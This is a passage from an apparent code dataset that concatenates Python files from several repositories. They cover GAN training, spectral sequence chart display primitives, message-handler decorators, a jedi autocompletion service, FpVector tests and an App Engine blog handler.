l_g_total += sum(precise_loss_idt_B) * self.lambda_idt / self.accumulations
for kidt_B, vidt_B in log_idt_dict.items():
self.log_dict[f'{kidt_B}_idt'] = vidt_B
for sn, fake, real, sel, w in zip(
rep_names, sel_fakes, sel_reals, selectors, rep_ws):
if not sel:
continue
precise_loss_results, log_dict = self.precisegeneratorlosses(
fake, real, {}, self.f_low, selector=sel)
l_g_total += w * sum(precise_loss_results) / self.accumulations
for ksel, vsel in log_dict.items():
self.log_dict[f'{ksel}_{sn}'] = vsel # * w
# calculate gradients
if self.amp:
# call backward() on scaled loss to create scaled gradients.
self.amp_scaler.scale(l_g_total).backward()
else:
l_g_total.backward()
def optimize_parameters(self, step):
"""Calculate losses, gradients, and update network weights; called in every training iteration"""
# batch (mixup) augmentations
aug = None
if self.mixup:
self.real_B, self.real_A, mask, aug = BatchAug(
self.real_B, self.real_A,
self.mixopts, self.mixprob, self.mixalpha,
self.aux_mixprob, self.aux_mixalpha, self.mix_p
)
# run G(A)
with self.cast(): # casts operations to mixed precision if enabled, else nullcontext
self.forward() # compute fake images: G(A)
# batch (mixup) augmentations
# cutout-ed pixels are discarded when calculating loss by masking removed pixels
if aug == "cutout":
self.fake_B, self.real_B = self.fake_B*mask, self.real_B*mask
if self.cri_gan:
# update D_T and D_S
self.requires_grad(self.netD_T, True) # enable backprop for D_T
self.requires_grad(self.netD_S, True) # enable backprop for D_S
if isinstance(self.feature_loc, int):
# freeze up to the selected layers
for loc in range(self.feature_loc):
self.requires_grad(self.netD_T, False, target_layer=loc, net_type='D')
self.requires_grad(self.netD_S, False, target_layer=loc, net_type='D')
self.backward_D_T() # calculate gradients for D_T
self.backward_D_S() # calculate gradidents for D_S
# only step and clear gradient if virtual batch has completed
if (step + 1) % self.accumulations == 0:
if self.amp:
self.amp_scaler.step(self.optimizer_D)
self.amp_scaler.update()
else:
self.optimizer_D.step() # update D_T and D_S's weights
self.optimizer_D.zero_grad() # set D_T and D_S's gradients to zero
self.optDstep = True
# update G
if self.cri_gan:
# Ds require no gradients when optimizing G
self.requires_grad(self.netD_T, flag=False, net_type='D')
self.requires_grad(self.netD_S, flag=False, net_type='D')
self.backward_G() # calculate gradidents for G
# only step and clear gradient if virtual batch has completed
if (step + 1) % self.accumulations == 0:
if self.amp:
self.amp_scaler.step(self.optimizer_G)
self.amp_scaler.update()
else:
self.optimizer_G.step() # udpdate G's weights
self.optimizer_G.zero_grad() # set G's gradients to zero
self.optGstep = True
def get_current_log(self):
"""Return traning losses / errors. train.py will print out these on the
console, and save them to a file"""
return self.log_dict
def get_current_visuals(self):
"""Return visualization images. train.py will display and/or save these images"""
out_dict = OrderedDict()
for name in self.visual_names:
if isinstance(name, str):
out_dict[name] = getattr(self, name).detach()[0].float().cpu()
return out_dict
``` |
{
"source": "JoeyBF/sseq",
"score": 3
} |
#### File: python/spectralsequence_chart/display_primitives.py
```python
from typing import Union, List
UUID_str = str
DashPattern = List[int]
LineWidth = float
from .css_colors import CSS_COLORS_JSON
class Color:
""" Represents a color in RGBA colorspace. Each channel should be an integer from 0 to 255, values outside of this range will be clipped.
"""
CSS_COLORS = None
def __init__(self, r : int, g : int, b : int, a : int = 255):
"""
Args:
r (float): The red color channel.
g (float): The green color channel.
b (float): The blue color channel.
a (float): The alpha / transparency color channel.
"""
self._name = None
self._color = tuple(min(max(int(s), 0),255) for s in (r, g, b, a))
@staticmethod
def from_string(color : str) -> "Color":
if color.startswith("#"):
return Color.from_hex(color)
if color in Color.CSS_COLORS:
return Color.CSS_COLORS[color]
raise ValueError(f"Unrecognized color '{color}'")
@staticmethod
def from_hex(hex_str : str) -> "Color":
assert hex_str.startswith("#")
assert len(hex_str) == 7 or len(hex_str) == 9
parts = [hex_str[1:3], hex_str[3:5], hex_str[5:7]]
if len(hex_str) == 9:
parts.append(hex_str[7:])
parts = [int(s, 16) for s in parts]
return Color(*parts)
def to_hex(self) -> str:
return "#" + "".join([hex(s)[2:].zfill(2) for s in self._color])
def lerp(self, other : "Color", t : float) -> "Color":
""" Linearly interpolate between two colors.
Returns:
t * self + (1-t) * other.
"""
return Color(*(self._color[i] * t + other[i] * (1 - t) for i in range(4)))
def to_json(self):
result = dict(
type=type(self).__name__,
color= self.to_hex()
)
if self._name:
result["name"] = self._name
return result
@classmethod
def from_json(cls, json):
assert json["type"] == cls.__name__
result = Color.from_hex(json["color"])
result._name = json.get("name")
return result
def __repr__(self):
if self._name:
return f'Color("{self._name}")'
return f'Color("{self.to_hex()}")'
Color.CSS_COLORS = {}
for (name, value) in CSS_COLORS_JSON.items():
c = Color.from_hex(value)
c._name = name
Color.CSS_COLORS[name] = c
Color.CSS_COLORS["transparent"] = Color(0,0,0,0)
Color.CSS_COLORS["transparent"]._name = "transparent"
class ArrowTip:
""" An ArrowTip. Curently the only possible arrow tip is the standard one.
TODO: support for hook, some parameters.
"""
def __init__(self, tip="standard"):
self._tip = tip
# @property
# def tip(self):
# return self._tip
def to_json(self):
return dict(
type=type(self).__name__,
tip = self._tip,
)
@staticmethod
def from_json(json):
assert json.pop("type") == ArrowTip.__name__
return ArrowTip(**json)
def __repr__(self):
return f"ArrowTip('{self._tip}')"
from copy import deepcopy
class Shape:
""" A Shape. A Shape has three components: a background, a foreground, and a border (some of these may be empty).
The shape can be iteratively built up by starting with a string to be drawn at the center and wrapping it
with accents and border shapes.
If the whole shape is a single character, then the character will be rendered as the "background"
and the "border" will outline the border of the character.
If the characters are wrapped in a circle or rectangle, then the characters will be drawn in the "foreground" component,
the "background" component will consist of the interior of the bounding circle / rectangle, and the border will be the border
of the circle / rectangle.
"""
def __init__(self, character : str = None, font : str = None):
"""
TODO: Link to StixTwoMath.
Args:
character (str): The characters to render at the center of the shape.
font (str): The font to render the characters in. Currently the only supported font is "stix".
"""
self._name = None
if character:
self.dict = dict(
ty="character",
font=font or "stix",
char=character,
whole_shape=True
)
else:
self.dict = dict(ty="empty")
@staticmethod
def square(size : float):
return Shape().boxed(size)
@staticmethod
def circle(size : float):
return Shape().circled(size)
def circled(self, padding : float, num_circles : int = 1, circle_gap : float = 0, include_background : bool = True) -> "Shape":
""" Circle the existing shape with one or more circles.
Args:
padding (float): How much space to leave between the circle and the shape we are circling.
num_circles (int): How many concentric circles to draw. Because the padding is computed based on a bounding box,
repeatedly using `Shape.circled` leads to inconsistent spacing between the circles.
circle_gap (int): If num_circles > 1, how much space to leave between circles. If num_circles == 1, has no effect.
include_background (bool): If True, the background of the circle goes in the background component, if False,
the new circle makes no contribution to the background component.
"""
copy_dict = deepcopy(self.dict)
if "whole_shape" in copy_dict:
copy_dict["whole_shape"] = False
result = Shape()
result.dict = dict(
ty = "composed",
operation="circled",
padding=padding,
num_circles=num_circles,
circle_gap=circle_gap,
include_background=include_background,
innerShape=copy_dict
)
return result
def boxed(self, padding : float, include_background : bool = True) -> "Shape":
""" Box the existing shape.
Args:
padding (float): How much space to leave between the box and the shape we are boxing.
include_background (bool): If True, the background of the box goes in the background component, if False,
the new box makes no contribution to the background component.
"""
copy_dict = deepcopy(self.dict)
if "whole_shape" in copy_dict:
copy_dict["whole_shape"] = False
result = Shape()
result.dict = dict(
ty = "composed",
operation="boxed",
padding=padding,
include_background=include_background,
innerShape=copy_dict
)
return result
def to_json(self):
result = {"type" : type(self).__name__}
result.update(self.dict)
if self._name:
result["name"] = self._name
return result
@staticmethod
def from_json(json):
assert json.pop("type") == Shape.__name__
result = Shape()
if "name" in json:
result._name = json.pop("name")
result.dict = json
return result
def __repr__(self):
if self._name:
return f'Shape("{self._name}")'
return f"Shape({repr(self.dict)})"
```
#### File: python/spectralsequence_chart/page_property.py
```python
from .infinity import INFINITY
import json
from typing import List, Tuple, Any, Type, Union, TypeVar, Generic, Optional, Dict, cast, Callable
T = TypeVar('T')
class PageProperty(Generic[T]):
"""
A class to represent a property that varies depending on the pages of a spectral sequence.
This is the main helper class that encapsulates any property of a class, edge, or chart
that varies depending on the page.
Examples:
>>> p = PageProperty(1)
>>> p[4] = 7
>>> p[2]
1
>>> p[4]
7
"""
def __init__(self,
value : T,
parent : Optional[Any] = None,
callback : Optional[Callable[[], None]] = None,
):
""" Initialize the PageProperty to always have value v."""
self._values : List[Tuple[int, T]] = [(0, value)]
self.set_parent(parent)
self._callback = callback
def set_parent(self, parent : Optional[Any]):
self._parent = parent
def set_callback(self, callback : Callable[[], None]):
self._callback = callback
def _needs_update(self):
if self._parent:
self._parent._needs_update()
if self._callback:
self._callback()
def _find_index(self, target_page : int) -> Tuple[int, bool]:
result_idx = None
for (idx, (page, _)) in enumerate(self._values):
if page > target_page:
break
result_idx = idx
# We need to help out the type checker here
if result_idx is None:
raise ValueError(f"Page Property indexed with negative index: {target_page}")
return (result_idx, self._values[result_idx][0] == target_page)
def __getitem__(self, x : Union[int, slice]) -> T:
stop = None
if type(x) == slice:
stop = x.stop or INFINITY
x = x.start or 0
if type(x) != int:
raise TypeError(f"Expected integer, got {type(x).__name__}.")
assert type(x) is int # Make type analysis thing happy
(idx, _) = self._find_index(x)
if stop:
(idx2, _) = self._find_index(stop - 1)
if idx != idx2:
raise ValueError("Indexed with slice but value is inconsistent across slice.")
return self._values[idx][1]
def __setitem__(self, p : Union[int, slice], v : T) -> None:
if hasattr(v, "set_parent"):
v.set_parent(self)
if type(p) is int:
self._setitem_single(p, v)
self._merge_redundant()
self._needs_update()
return
if type(p) is not slice:
raise TypeError("Excepted int or slice!")
start = p.start or 0
stop = p.stop or INFINITY
orig_value = self[stop]
(start_idx, _) = self._setitem_single(start, v)
(end_idx, hit_end) = self._find_index(stop)
if not hit_end and stop < INFINITY:
(end_idx, _) = self._setitem_single(stop, orig_value)
if stop == INFINITY:
end_idx += 1
del self._values[start_idx + 1 : end_idx]
self._merge_redundant()
self._needs_update()
def _setitem_single(self, p : int, v : T):
(idx, hit) = self._find_index(p)
if hit:
self._values[idx] = (p, v)
else:
idx += 1
self._values.insert(idx, (p, v))
return (idx, hit)
def _merge_redundant(self):
for i in range(len(self._values) - 1, 0, -1):
if self._values[i][1] == self._values[i-1][1]:
del self._values[i]
def __repr__(self) -> str:
values = ", ".join([f"{page}: {value}" for (page, value) in self._values])
return f"PageProperty{{{values}}}"
def __eq__(self, other):
if type(other) != PageProperty:
return False
return self._values == other._values
def map_values_in_place(self, f):
for i in range(len(self._values)):
(p, v) = self._values[i]
self._values[i] = (p, f(v))
def to_json(self) -> Dict[str, Any]:
if len(self._values) == 1:
return self._values[0][1]
else:
return {"type" : "PageProperty", "values" : self._values }
@staticmethod
def from_json(json_obj : Dict[str, Any]) -> "PageProperty[Any]":
result : PageProperty[Any] = PageProperty(None)
result._values = [cast(Tuple[int, Any], tuple(x)) for x in json_obj["values"]]
return result
S = TypeVar('S')
PagePropertyOrValue = Union[S, PageProperty[S]]
def ensure_page_property(v : PagePropertyOrValue[S], parent : Optional[Any] = None) -> PageProperty[S]:
if(type(v) is PageProperty):
result = v
else:
result = PageProperty(v)
if parent:
result.set_parent(parent)
return result
```
#### File: message_passing_tree/message_passing_tree/decorators.py
```python
from copy import copy
import functools
import inspect
import sys
import traceback
from . import ansi
from .agent import Agent
def reset_global_handlers():
global HANDLERS
HANDLERS = {
"in" : { },
"out" : { },
}
reset_global_handlers()
def subscribe_to(subs):
def helper(cls):
if subs == "*":
cls.subscriptions = set(["*"])
elif type(subs) is list:
cls.subscriptions = set(subs)
else:
raise TypeError(f"""Subscribe decorator argument expected to be either "*" or a list, not "{subs}".""")
return cls
return helper
def add_inherited_handlers(cls):
outward_handlers = {}
inward_handlers = {}
for super in cls.__bases__:
if hasattr(super, "outward_handlers") and super.outward_handlers is not None:
outward_handlers.update(super.outward_handlers)
if hasattr(super, "inward_handlers") and super.inward_handlers is not None:
inward_handlers.update(super.inward_handlers)
outward_handlers.update(cls.outward_handlers)
inward_handlers.update(cls.inward_handlers)
cls.outward_handlers = outward_handlers
cls.inward_handlers = inward_handlers
return cls
def collect_handlers(*, inherit):
def helper(cls):
cls.outward_handlers = HANDLERS["out"]
cls.inward_handlers = HANDLERS["in"]
reset_global_handlers()
if inherit:
add_inherited_handlers(cls)
return cls
return helper
def handle_inbound_messages(func):
return handle("in")(func)
def handle_outbound_messages(func):
return handle("out")(func)
handler_source_agent_argument_name = {"in" : "source_agent_path", "out" : "source_agent_id"}
def declared_at(func):
filename = inspect.getsourcefile(func)
lineno = inspect.getsourcelines(func)[1]
ctx = inspect.getframeinfo(inspect.stack()[3][0])
try:
cls = ctx.function
finally:
del ctx
return f""""{ansi.info(func.__name__)}" was declared:\n""" +\
f""" in file "{ansi.info(filename)}"\n""" +\
f""" in class "{ansi.info(cls)}"\n""" +\
f""" on line {ansi.info(lineno)}"""
def handle(in_or_out : str):
if in_or_out not in HANDLERS:
raise ValueError(f"""Second argument "in_or_out" should be "in" or "out" not "{in_or_out}".""")
def helper(func):
colored_func_name = f"{ansi.info(func.__name__)}"
func_args = inspect.getargspec(func).args
second_argument_name = handler_source_agent_argument_name[in_or_out]
def get_sample_declaration(colored_positions):
subs = [ansi.INFO]*6
for i, pos in enumerate(["async", "self", "envelope"]):
if pos in colored_positions:
subs[2*i] = ansi.CORRECTION
return f""""{colored_func_name}" should be declared as"""+\
f""" "{ansi.INFO}%sasync%s def {func.__name__}(%sself%s, %senvelope%s, ...){ansi.NOCOLOR}".""" % tuple(subs)
if not inspect.iscoroutinefunction(func):
raise TypeError(
f"""Handler method "{colored_func_name}" """ +\
f"""should be defined with the "{ansi.correction("async")}" keyword.\n""" +\
get_sample_declaration(["async"]) + "\n" +\
declared_at(func) + "\n" +\
declared_at(func)
)
prefix = "handle__"
suffix = "__a"
if not func.__name__.startswith(prefix):
raise TypeError(
f"""Handler method name "{ansi.mistake(func.__name__)}" """ +\
f"""should start with "{ansi.correction(prefix)}".""" + "\n" +\
declared_at(func)
)
if not func.__name__.endswith(suffix):
raise TypeError(
f"""Handler method name "{ansi.mistake(func.__name__)}" """ +\
f"""should end with "{ansi.correction(suffix)}".""" + "\n" +\
declared_at(func)
)
if len(func_args) < 2:
raise TypeError(
f"""Handler method "{colored_func_name}" """ +\
f"""should have at least two positional arguments.\n""" +\
get_sample_declaration(["self", "envelope"]) + "\n" +\
declared_at(func)
)
if func_args[0] != "self":
raise TypeError(
f"""The first argument of handler method "{colored_func_name}" """ +\
f"""should be named "{ansi.correction("self")}" not "{ansi.mistake(func_args[0])}".\n""" +\
get_sample_declaration(["self"]) + "\n" +\
declared_at(func)
)
if func_args[1] != "envelope":
raise TypeError(
f"""The second argument of handler function "{colored_func_name}" """ +\
f"""should be named "{ansi.correction("envelope")}" not "{ansi.mistake(func_args[1])}".\n""" +\
get_sample_declaration(["envelope"]) + "\n" +\
declared_at(func)
)
handler_cmd = get_handler_cmd(func)
wrapper = get_handler_wrapper(in_or_out, func)
HANDLERS[in_or_out][handler_cmd] = wrapper
return wrapper
return helper
# Given a function named "handle__cmd__sub_cmd__a" return "cmd.sub_cmd"
def get_handler_cmd(func):
prefix = "handle__"
if not func.__name__.startswith(prefix):
raise ValueError(f"""Method name {func.__name__} should start with "{prefix}".""")
suffix="__a"
if not func.__name__.endswith(suffix):
raise ValueError(f"""Method name {func.__name__} should end with "{suffix}".""")
result = func.__name__[len(prefix):-len(suffix)].replace("__", ".")
if result == "all":
return "*"
return result
def get_handler_wrapper(in_or_out, func_a):
async def handler_wrapper_a(self, envelope):
self.log_envelope_task(f"handle_{in_or_out}bound_method", envelope)
try:
await func_a(self,
envelope,
*envelope.msg.args, **envelope.msg.kwargs
)
except TypeError as e:
add_wrapped_func_to_stack_trace_if_necessary(e, handler_wrapper_a, func_a)
raise
if in_or_out == "out":
msg = envelope.msg
new_msg = copy(msg)
new_msg.cmd = copy(msg.cmd)
envelope.msg = new_msg
return handler_wrapper_a
class MockTraceback:
def __init__(self, tb_frame, tb_lineno):
self.tb_frame = tb_frame
self.tb_lineno = tb_lineno
self.tb_next = None
class MockFrame:
def __init__(self, code):
self.f_code = code
self.f_globals = globals()
def add_wrapped_func_to_stack_trace_if_necessary(exception, wrapper, func):
""" If either the message is wrong or the argspec of the handler function is wrong,
then we might get a TypeError reporting that the wrapped function has incorrect arguments.
By default, the resulting stacktrace only mentions "func" leaving the identity of the wrapped
function completely unclear.
If there is an error
"""
if traceback.extract_tb(exception.__traceback__)[-1].name != wrapper.__name__:
return
# exc_type, exc_instance, exc_traceback = exc_info
filename = inspect.getsourcefile(func)
lineno = inspect.getsourcelines(func)[1]
exception.extra_traceback = traceback.extract_tb(
MockTraceback(
tb_lineno=lineno,
tb_frame=MockFrame(func.__code__)
)
)
```
#### File: python/repl/completer.py
```python
from .handler_decorator import *
import jedi
from uuid import uuid4
from collections import OrderedDict
import re
SPHINX = re.compile(r"\s*:param\s+(?P<param>\w+):\s*(?P<doc>[^\n]+)")
EPYDOC = re.compile(r"\s*@param\s+(?P<param>\w+):\s*(?P<doc>[^\n]+)")
GOOGLE = re.compile(r"\s*[*]{0,2}(?P<param>\w+).*:\s*(?P<doc>[^\n]+)")
DOC_REGEX = [SPHINX, EPYDOC, GOOGLE]
def _param_docs(docstring, param_name):
for line in docstring.splitlines():
for regex in DOC_REGEX:
m = regex.match(line)
if not m:
continue
if m.group('param') != param_name:
continue
return m.group('doc') or ""
def format_docstring(contents):
"""Python doc strings come in a number of formats, but LSP wants markdown.
Until we can find a fast enough way of discovering and parsing each format,
we can do a little better by at least preserving indentation.
"""
if contents is None:
return contents
contents = contents.replace('\t', u'\u00A0' * 4)
contents = contents.replace(' ', u'\u00A0' * 2)
return contents
class LRU(OrderedDict):
'Limit size, evicting the least recently looked-up key when full'
def __init__(self, maxsize=5, *args, **kwdargs):
self.maxsize = maxsize
super().__init__(*args, **kwdargs)
def __getitem__(self, key):
value = super().__getitem__(key)
self.move_to_end(key)
return value
def __setitem__(self, key, value):
if key in self:
self.move_to_end(key)
super().__setitem__(key, value)
if len(self) > self.maxsize:
oldest = next(iter(self))
del self[oldest]
@collect_handlers("message_handlers")
class Completer:
def __init__(self, executor, *, uuid):
self.executor = executor
self.uuid = uuid
self.code = None
self.states = LRU()
async def handle_message_a(self, subcmd, **kwargs):
if subcmd not in self.message_handlers:
raise Exception(f'Message with unrecognized subcommand "{subcmd}"')
handler = self.message_handlers[subcmd]
await handler(self, **kwargs)
async def send_message_a(self, subcmd, subuuid, **kwargs):
await self.executor.send_message_a("complete", self.uuid, subcmd=subcmd, subuuid=subuuid, **kwargs)
@handle("signatures")
async def get_signature_help_a(self, subuuid, code, lineNumber, column):
try:
interpreter = jedi.Interpreter(code, [self.executor.namespace])
jedi_signatures = interpreter.get_signatures(line=lineNumber, column=column)
# For some reason, get_type_hint doesn't work the same on signatures as on completions...
[signatures, full_name, root] = self.get_signature_help_helper(jedi_signatures, code)
await self.send_message_a("signatures", subuuid, signatures=signatures, full_name=full_name, root=root)
except RecursionError:
await self.send_message_a("signatures", subuuid, signatures=None, full_name=None, root=None)
except KeyboardInterrupt:
pass
def get_signature_help_helper(self, jedi_signatures, code):
import jedi
if not jedi_signatures:
return [None, None, None]
s = jedi_signatures[0]
# docstring() returns a signature with fully qualified type names.
# This is ugly. get_type_hint() does better but it only works on Completion objects,
# not on Signature. Thus, we get a completion object. To do so, we ask for a completion at
# the open bracket of the current function.
completion = jedi.Interpreter(code, [self.executor.namespace]).complete(*s.bracket_start)[0]
try:
function_sig = completion.get_type_hint()
except NotImplementedError:
return [None, None, None]
[full_name, root] = self.get_fullname_root(completion)
if function_sig and completion.parent().type == "instance":
function_sig = function_sig.replace("self, ", "")
sig = {
'label': function_sig,
'documentation': format_docstring(s.docstring(raw=True))
}
# If there are params, add those
if s.params:
sig['parameters'] = [{
'label': p.name,
'documentation': _param_docs(s.docstring(), p.name)
} for p in s.params]
# We only return a single signature because Python doesn't allow overloading
sig_info = {'signatures': [sig], 'activeSignature': 0}
if s.index is not None and s.params:
# Then we know which parameter we're looking at
sig_info['activeParameter'] = s.index
return [sig_info, full_name, root]
@handle("completions")
async def get_completions_a(self, subuuid, code, lineNumber, column):
try:
self.code = code
state_id = str(uuid4())
completions = jedi.Interpreter(code, [self.executor.namespace]) \
.complete(line=lineNumber, column=column, fuzzy=True)
self.states[state_id] = completions
result = []
for comp in completions:
result.append(dict(
name=comp.name,
kind=comp.type
))
await self.send_message_a("completions", subuuid, completions=result, state_id=state_id)
except RecursionError:
await self.send_message_a("completions", subuuid, completions=[], state_id=None)
except KeyboardInterrupt:
pass
@handle("completion_detail")
async def get_completion_info_a(self, subuuid, state_id, idx):
completion = self.states[state_id][idx]
try:
# Try getting name and root for link to api docs.
# Will fail on properties.
[full_name, root] = self.get_fullname_root(completion)
if completion.type == "instance":
[docstring, signature, full_name, root] = self.get_completion_info_instance(subuuid, completion)
elif completion.type in ["function", "method"]:
[docstring, signature] = self.get_completion_info_function_or_method(subuuid, completion)
elif completion.type == "module":
signature = completion.infer()[0].full_name
docstring = completion.docstring(raw=True)
else:
signature = completion._get_docstring_signature()
docstring = completion.docstring(raw=True)
except Exception as e:
print("Error triggered during completion detail for", completion.name, "type:", completion.type)
raise
except KeyboardInterrupt:
return
# regex = re.compile('(?<!\n)\n(?!\n)', re.MULTILINE) # Remove isolated newline characters.
remove_links = re.compile('`(\S*) <\S*>`')
docstring = remove_links.sub(r"`\1`", docstring)
await self.send_message_a("completion_detail", subuuid, docstring=format_docstring(docstring), signature=signature, full_name=full_name, root=root)
def get_fullname_root(self, completion):
if completion.name.startswith("_") or completion.name in ["from_json", "to_json"]:
return [None, None]
try:
full_name = completion.infer()[0].full_name
except IndexError:
return [None, None]
if not full_name or not full_name.startswith("spectralsequence_chart"):
return [None, None]
if completion.type in ["class", "module"]:
return [full_name, full_name]
root = ".".join(full_name.split(".")[:-1])
return [full_name, root]
def get_completion_info_instance(self, subuuid, completion):
""" Jedi by default does a bad job of getting the completion info for "instances".
If the instance is a property on a class with an available docstring, then we report that.
In any case, give the signature as "name: type".
"""
docstring = ""
type_string = ""
full_name = None
root = None
try:
# Jedi makes it a bit tricky to get from the Jedi wrapper object to the object it refers to...
object = completion.get_signatures()[0]._name._value.access_handle.access._obj
parent_object = completion._name._wrapped_name._parent_value.access_handle.access._obj
parent_type = type(parent_object)
object = None
from inspect import getdoc
if hasattr(parent_type, completion.name):
prop = getattr(parent_type, completion.name)
docstring = getdoc(prop)
object = prop.fget
elif type(getattr(parent_object, completion.name)) is property:
prop = getattr(parent_object, completion.name)
docstring = getdoc(prop)
object = prop.fget
if object.__module__.startswith("spectralsequence_chart"):
full_name = f"{object.__module__}.{object.__qualname__}"
root = ".".join(full_name.split(".")[:-1])
# full_name = object.full_name
if object:
from parso import parse
from inspect import getsource
# In this case, type(object).__name__ unfortunately gives "property", which isn't very descriptive.
# We would like to get the actual type, so we use parso to extract the type from the source.
# This will throw OSError for interpreter defined classes, but we don't expect many of those.
funcdef = next(parse(getsource(object)).iter_funcdefs())
type_string = funcdef.annotation.get_code()
except (AttributeError, OSError): # AttributeError:
pass
if type_string:
signature = f"{completion.name}: {type_string}"
else:
signature = ""
return [docstring, signature, full_name, root]
def get_completion_info_function_or_method(self, subuuid, completion):
docstring = completion.docstring(raw=True) or completion._get_docstring()
try:
# Collect the return type signature for the method. TODO: this only should be used for type function or method.
# docstring() returns a signature with fully qualified type names.
# This is ugly, so we use get_type_hint() instead.
signature = completion.get_type_hint()
if completion.parent().type == "instance":
signature = signature.replace("self, ", "")
except (AttributeError, TypeError, NotImplementedError):
signature = completion._get_docstring_signature()
pass
return [docstring, signature]
```
#### File: python_ext/ext/__utils.py
```python
import sys
import rust_ext
def export_all_rust_names(module_path):
module = sys.modules[module_path]
rust_module = get_rust_module(module_path)
for name in getattr(rust_module, "__all__"):
setattr(module, name, getattr(rust_module, name))
def get_rust_module(module_path):
split_path = module_path.split(".")[1:]
split_path[0] = remove_prefix_if_present(split_path[0], "rust_")
rust_module_name = ".".join(split_path)
return getattr(rust_ext, rust_module_name)
def remove_prefix_if_present(s, prefix):
if s.startswith(prefix):
return s[len(prefix):]
else:
return s
```
#### File: python_ext/test/test_FpVector.py
```python
import pytest
import random
from fp_linear_algebra import FpVector
primes = [2, 3, 5, 7, 11]
dimensions = [5, 10, 33, 65, 1000]
repeats = 1000
class TestFpVector:
def setup_class(self):
pass
@pytest.mark.parametrize("dimension", dimensions)
@pytest.mark.parametrize("p", primes)
def test_freed(self, p, dimension):
v = FpVector(p, dimension)
w = FpVector(p, dimension)
v.free()
assert str(v) == "FreedVector"
with pytest.raises(ReferenceError):
v[0]
with pytest.raises(ReferenceError):
v[-1]
with pytest.raises(ReferenceError):
v.add(w, 1)
with pytest.raises(ReferenceError):
w.add(v, 1)
with pytest.raises(ReferenceError):
v.add_basis_element(2, 1)
with pytest.raises(ReferenceError):
v.assign(w)
with pytest.raises(ReferenceError):
w.assign(v)
with pytest.raises(ReferenceError):
v.dimension()
with pytest.raises(ReferenceError):
v.free()
with pytest.raises(ReferenceError):
v.is_zero()
with pytest.raises(ReferenceError):
v.is_zero_pure()
with pytest.raises(ReferenceError):
v.set_to_zero()
with pytest.raises(ReferenceError):
v.set_to_zero_pure()
with pytest.raises(ReferenceError):
v.to_list()
@pytest.mark.parametrize("dimension", dimensions)
@pytest.mark.parametrize("p", primes)
def test_to_from_list(self, p, dimension):
list = [random.randint(0,p-1) for _ in range(dimension)]
v = FpVector.from_list(p, list)
result = v.to_list()
v.free()
assert list == result
@pytest.mark.parametrize("dimension", [10])
@pytest.mark.parametrize("p", [3])
def test_pack_get(self, p, dimension):
list = [random.randint(0,p-1) for x in range(dimension)]
vector = FpVector.from_list(p, list)
for i in range(dimension):
assert vector[i] == list[i]
assert vector[-i-1] == list[-i-1]
with pytest.raises(IndexError):
vector[dimension]
with pytest.raises(IndexError):
vector[-dimension-1]
vector.free()
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_set_get(self, p, dim):
v = FpVector(p, dim)
k = [0] * dim
for i in range(repeats):
index = random.randint(0, dim-1)
value = random.randint(0, p-1)
assert v[index] == k[index]
k[index] = value
v[index] = value
assert v[index] == k[index]
result = v.to_list()
v.free()
assert result == k
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_assign(self, p, dim):
k = [random.randint(0,p-1) for x in range(dim)]
l = [random.randint(0,p-1) for x in range(dim)]
v = FpVector.from_list(p, k)
w = FpVector.from_list(p, l)
v.assign(w)
result = v.to_list()
v.free()
w.free()
assert result == l
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_self_assign(self, p, dim):
k = [random.randint(0,p-1) for x in range(dim)]
v = FpVector.from_list(p, k)
v.assign(v)
result = v.to_list()
assert result == k
@pytest.mark.parametrize("p", primes)
def test_zero_dimensional_vec(self, p):
v = FpVector(p, 0)
w = FpVector(p, 0)
v.add(w, 1)
v.scale(3)
v.assign(w)
with pytest.raises(IndexError):
v[0]
with pytest.raises(IndexError):
v[-1]
with pytest.raises(IndexError):
v[2]
v.free()
@pytest.mark.parametrize("p", primes)
def test_index_zero_dimensional_vec(self, p):
pass
@pytest.mark.parametrize("dim", dimensions)
@pytest.mark.parametrize("p", primes)
def test_addBasisElement(self, p, dim):
v = FpVector(p, dim)
k = [0] * dim
for i in range(repeats):
index = random.randint(0, dim-1)
value = random.randint(0, p-1)
k[index] += value
k[index] = k[index] % p
v.add_basis_element(index, value)
result = v.to_list()
v.free()
assert result == k
def atest_add(self, p, v, w):
result = []
for (a, b) in zip(v,w):
result.append(a+b % p)
assert self.is_prime(n) == expected
```
#### File: webserver/spectralsequences_webserver/utils.py
```python
import pathlib
import sys
def exec_file_if_exists(path, globals, locals):
if path.is_file():
code = compile(path.read_text(), path, "exec")
exec(code, globals, locals)
def exec_file(path, globals, locals):
code = compile(path.read_text(), path, "exec")
exec(code, globals, locals)
def bind(instance, func, as_name=None):
"""
Bind the function *func* to *instance*, with either provided name *as_name*
or the existing name of *func*. The provided *func* should accept the
instance as the first argument, i.e. "self".
"""
if as_name is None:
as_name = func.__name__
bound_method = func.__get__(instance, instance.__class__)
setattr(instance, as_name, bound_method)
return bound_method
``` |
{
"source": "joeyb/joeyb-blog",
"score": 2
} |
#### File: joeyb-blog/handlers/blog.py
```python
import datetime
import config
import PyRSS2Gen
from google.appengine.ext import webapp
from models import blog
import view
class IndexHandler(webapp.RequestHandler):
def get(self):
query = blog.Post.all()
query.order('-pub_date')
template_values = {'page_title': 'Home',
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class PostHandler(webapp.RequestHandler):
def get(self, year, month, day, slug):
year = int(year)
month = int(month)
day = int(day)
# Build the time span to check for the given slug
start_date = datetime.datetime(year, month, day)
time_delta = datetime.timedelta(days=1)
end_date = start_date + time_delta
# Create a query to check for slug uniqueness in the specified time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
query.filter('slug = ', slug)
post = query.get()
if post == None:
page = view.Page()
page.render_error(self, 404)
else:
template_values = {
'post': post,
}
page = view.Page()
page.render(self, 'templates/blog/post.html', template_values)
class TagHandler(webapp.RequestHandler):
def get(self, tag):
query = blog.Post.all()
query.filter('tags = ', tag)
query.order('-pub_date')
template_values = {'page_title': 'Posts tagged "%s"' % (tag),
'page_description': 'Posts tagged "%s"' % (tag),
}
page = view.Page()
page.render_paginated_query(self, query, 'posts', 'templates/blog/index.html', template_values)
class YearHandler(webapp.RequestHandler):
def get(self, year):
year = int(year)
# Build the time span to check for posts
start_date = datetime.datetime(year, 1, 1)
end_date = datetime.datetime(year + 1, 1, 1)
# Create a query to find posts in the given time span
query = blog.Post.all()
query.filter('pub_date >= ', start_date)
query.filter('pub_date < ', end_date)
